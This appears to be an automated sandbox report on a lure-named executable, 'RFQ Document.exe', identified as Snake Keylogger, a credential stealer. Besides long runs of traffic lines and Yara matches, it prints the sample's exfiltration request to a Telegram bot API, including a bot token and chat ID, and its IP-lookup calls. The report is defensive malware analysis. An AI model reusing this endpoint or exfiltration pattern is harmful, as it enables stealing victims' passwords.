                  Source: unknownNetwork traffic detected: HTTP traffic on port 50152 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50070 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50141 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50118 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50163 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50140 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50175
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50174
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50056
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50177
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50176
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50058
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50179
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50057
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50178
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50059
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50180
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50061
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50182
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50060
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50181
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50063
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50062
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50068 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50102 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50125 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50148 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50065
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50067
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50091 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50113 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50056 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50066
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50068
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50070
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50159 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50073
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50147 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50172 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50076
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50078
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50114 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50082
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50084
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50087
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50089
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50091
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50094
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50136 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50093
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50139
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50170 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50138
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50149 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50131
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50130
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50133
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50132
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50135
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50134
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50078 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50137
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50136
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50161 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50140
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50149
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50142
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50141
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50144
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50143
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50146
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50148
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50147
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50151
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50138 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50150
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50103 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50153
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50152
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50155
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50154
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50157
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
                  Source: RFQ Document.exe, 00000002.00000002.926600469.0000000002461000.00000004.00000001.sdmpString found in binary or memory: http://checkip.dyndns.org
                  Source: RFQ Document.exeString found in binary or memory: http://checkip.dyndns.org/
                  Source: RFQ Document.exe, 00000001.00000002.674264323.000000000E7D0000.00000004.00000001.sdmp, RFQ Document.exe, 00000002.00000001.671831085.0000000000414000.00000040.00020000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                  Source: RFQ Document.exe, 00000002.00000002.926172062.0000000000818000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                  Source: RFQ Document.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
                  Source: RFQ Document.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                  Source: RFQ Document.exeString found in binary or memory: http://schemas.m
                  Source: RFQ Document.exe, 00000002.00000002.926600469.0000000002461000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: RFQ Document.exe, 00000002.00000003.861059471.0000000002A86000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram
                  Source: RFQ Document.exe, RFQ Document.exe, 00000002.00000001.671831085.0000000000414000.00000040.00020000.sdmpString found in binary or memory: https://api.telegram.org/bot
                  Source: RFQ Document.exe, 00000002.00000002.929213067.0000000005FCB000.00000004.00000001.sdmp, RFQ Document.exe, 00000002.00000003.861005087.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664
                  Source: RFQ Document.exe, 00000002.00000002.926695160.00000000024D6000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org41lX
                  Source: RFQ Document.exe, 00000002.00000002.929213067.0000000005FCB000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.orgD81l
                  Source: RFQ Document.exe, 00000002.00000002.929213067.0000000005FCB000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.orgD81l$T
                  Source: RFQ Document.exe, 00000002.00000002.929213067.0000000005FCB000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.orgD81l$U
                  Source: RFQ Document.exe, 00000002.00000002.929213067.0000000005FCB000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.orgD81l(
                  Source: RFQ Document.exe, 00000002.00000002.929213067.0000000005FCB000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.orgD81l4
                  Source: RFQ Document.exe, 00000002.00000002.929213067.0000000005FCB000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.orgD81lD
                  Source: RFQ Document.exe, 00000002.00000002.929106581.0000000005EFE000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.orgD81lDP
                  Source: RFQ Document.exe, 00000002.00000002.929213067.0000000005FCB000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.orgD81lL
                  Source: RFQ Document.exe, 00000002.00000002.929213067.0000000005FCB000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.orgD81lL-
                  Source: RFQ Document.exe, 00000002.00000002.929213067.0000000005FCB000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.orgD81lLH
                  Source: RFQ Document.exe, 00000002.00000002.929213067.0000000005FCB000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.orgD81lLc
                  Source: RFQ Document.exe, 00000002.00000002.929213067.0000000005FCB000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.orgD81lT
                  Source: RFQ Document.exe, 00000002.00000002.929213067.0000000005FCB000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.orgD81lT8
                  Source: RFQ Document.exe, 00000002.00000002.929213067.0000000005FCB000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.orgD81lT~
                  Source: RFQ Document.exe, 00000002.00000002.929213067.0000000005FCB000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.orgD81lda0
                  Source: RFQ Document.exe, 00000002.00000002.929213067.0000000005FCB000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.orgD81ldb
                  Source: RFQ Document.exe, 00000002.00000002.929213067.0000000005FCB000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.orgD81ll
                  Source: RFQ Document.exe, 00000002.00000002.929213067.0000000005FCB000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.orgD81lt
                  Source: RFQ Document.exe, RFQ Document.exe, 00000002.00000001.671831085.0000000000414000.00000040.00020000.sdmpString found in binary or memory: https://freegeoip.app/xml/
                  Source: RFQ Document.exe, 00000002.00000002.926634482.00000000024A7000.00000004.00000001.sdmpString found in binary or memory: https://freegeoip.app/xml/84.17.52.39
                  Source: RFQ Document.exe, 00000002.00000002.926634482.00000000024A7000.00000004.00000001.sdmpString found in binary or memory: https://freegeoip.app41l
                  Source: unknownHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255b68d7103Host: api.telegram.orgContent-Length: 407Connection: Keep-Alive
                  Source: unknownDNS traffic detected: queries for: clientconfig.passport.net
                  Source: global trafficHTTP traffic detected: GET /xml/84.17.52.39 HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49775 version: TLS 1.2
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 1_2_00404FF1 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

                  System Summary:

                  barindex
                  Malicious sample detected (through community Yara rule)Show sources
                  Source: 2.2.RFQ Document.exe.7b49c8.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 2.2.RFQ Document.exe.22f0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 2.2.RFQ Document.exe.3465530.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 2.2.RFQ Document.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 2.2.RFQ Document.exe.7b49c8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 2.2.RFQ Document.exe.4940000.5.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 1.2.RFQ Document.exe.e7e1458.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 2.1.RFQ Document.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 2.2.RFQ Document.exe.3465530.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 2.2.RFQ Document.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 1.2.RFQ Document.exe.e7e1458.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 2.2.RFQ Document.exe.22f0000.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 1.2.RFQ Document.exe.e7d0000.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 1.2.RFQ Document.exe.e7d0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 2.2.RFQ Document.exe.415058.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 2.1.RFQ Document.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 2.2.RFQ Document.exe.415058.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 2.1.RFQ Document.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 00000001.00000002.674264323.000000000E7D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 00000002.00000002.926522731.00000000022F0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 00000002.00000002.925923176.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Initial sample is a PE file and has a suspicious nameShow sources
                  Source: initial sampleStatic PE information: Filename: RFQ Document.exe
                  Executable has a suspicious name (potential lure to open the executable)Show sources
                  Source: RFQ Document.exeStatic file information: Suspicious name
                  Source: RFQ Document.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                  Source: 2.2.RFQ Document.exe.7b49c8.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 2.2.RFQ Document.exe.22f0000.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 2.2.RFQ Document.exe.3465530.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 2.2.RFQ Document.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 2.2.RFQ Document.exe.7b49c8.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 2.2.RFQ Document.exe.4940000.5.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 1.2.RFQ Document.exe.e7e1458.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 2.1.RFQ Document.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 2.2.RFQ Document.exe.3465530.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 2.2.RFQ Document.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 1.2.RFQ Document.exe.e7e1458.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
